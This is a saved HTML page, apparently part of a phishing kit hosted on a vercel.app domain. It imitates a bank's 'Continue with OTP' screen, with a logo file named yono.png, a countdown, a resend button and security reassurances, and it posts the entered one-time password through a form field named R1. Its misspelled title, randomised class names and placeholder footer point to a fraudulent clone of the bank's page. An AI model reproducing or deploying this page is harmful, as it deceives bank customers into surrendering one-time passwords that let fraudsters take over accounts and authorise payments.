<!DOCTYPE html>
<!-- saved from url=(0029)https://sb-bysf.vercel.app/kj -->
<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width">
    <title>Wellcometo</title>
    <meta name="next-head-count" content="3">
    <link rel="stylesheet" href="./css/style.css" />

</head>

<body cz-shortcut-listen="true">
    <div id="__next">
        <header class="Jeuookhh_logo__chFnY"><img alt="8wblnz" loading="lazy" width="120" height="32" decoding="async"
                data-nimg="1" src="./images/yono.png" style="color: transparent;"></header>
        <main>
            <div class="Jeuookhh_login_heading__g_rIN">
                <h3 class="Jeuookhh_login_heading_h3__40cUi">Continue with OTP</h3>
            </div>
            <div class="Jeuookhh_login_form__UT1PX">
                <p class="Jeuookhh_content_title__eLlbR">A one-time password has been sent to your registered mobile
                    number</p>
                <p class="Jeuookhh_mandatory_txt__seeNN">Required fields an asterisk (*)</p>
                <form class="Jeuookhh_form__NPDIu" method="post"><input type="hidden" name="formtoken" value="cuigGk">
                    <div class="Jeuookhh_form_group__iOuIR"><label class="Jeuookhh_label__fvDl5">Enter the One
                            Time-Password <span class="Jeuookhh_mandatory_txt__seeNN">*</span></label><input name="R1"
                            type="text" class="Jeuookhh_form_control__aKuXl" required="" minlength="6" maxlength="8">
                    </div>
                    <div class="Jeuookhh_t_center____ZxZ"><input type="submit" class="Jeuookhh_btn_default__PIkhU"
                            value="submit"></div>
                </form>
                <div class="Jeuookhh_t_center____ZxZ">
                    <p>02:40</p>
                </div>
                <div class="Jeuookhh_t_center____ZxZ">
                    <p>In case you haven't received a one-time password (OTP) on your mobile phone, &nbsp;<button
                            class="Jeuookhh_btn_resend__klTLK" type="button">click here to resend</button></p>
                </div>
                <div class="Jeuookhh_info_panel__n1fy6">
                    <div class="Jeuookhh_notify_icon__8mrta">
                        <ul>
                            <li>Please note that all calls, SMS, and email correspondence will be sent to your
                                registered mobile number</li>
                            <li>We will never contact you via email, SMS, or phone calls to request your personal
                                information.</li>
                            <li>Please refrain from responding to any suspicious SMS, calls, or emails. Kindly report
                                any such suspicious activity immediately for further investigation.</li>
                        </ul>
                    </div>
                </div>
            </div>
        </main>
        <div class="Jeuookhh_footer_area__5ot65"><img alt="1ZaFOQ" loading="lazy" width="68" height="28"
                decoding="async" data-nimg="1" src="./images/gwhp.png" style="color: transparent;"></div>
        <div class="Jeuookhh_footer__Wxn0J">
            <p>©</p>
        </div>
    </div>
    <script id="__NEXT_DATA__" type="application/json"
        crossorigin="">{"props":{"pageProps":{}},"page":"/","query":{},"buildId":"0lCBycRkeqCWXcllfoPaw","nextExport":true,"autoExport":true,"isFallback":false,"scriptLoader":[]}</script>
    <next-route-announcer>
        <p aria-live="assertive" id="__next-route-announcer__" role="alert"
            style="border: 0px; clip: rect(0px, 0px, 0px, 0px); height: 1px; margin: -1px; overflow: hidden; padding: 0px; position: absolute; top: 0px; width: 1px; white-space: nowrap; overflow-wrap: normal;">
            Loading...</p>
    </next-route-announcer>
    
</body>

</html>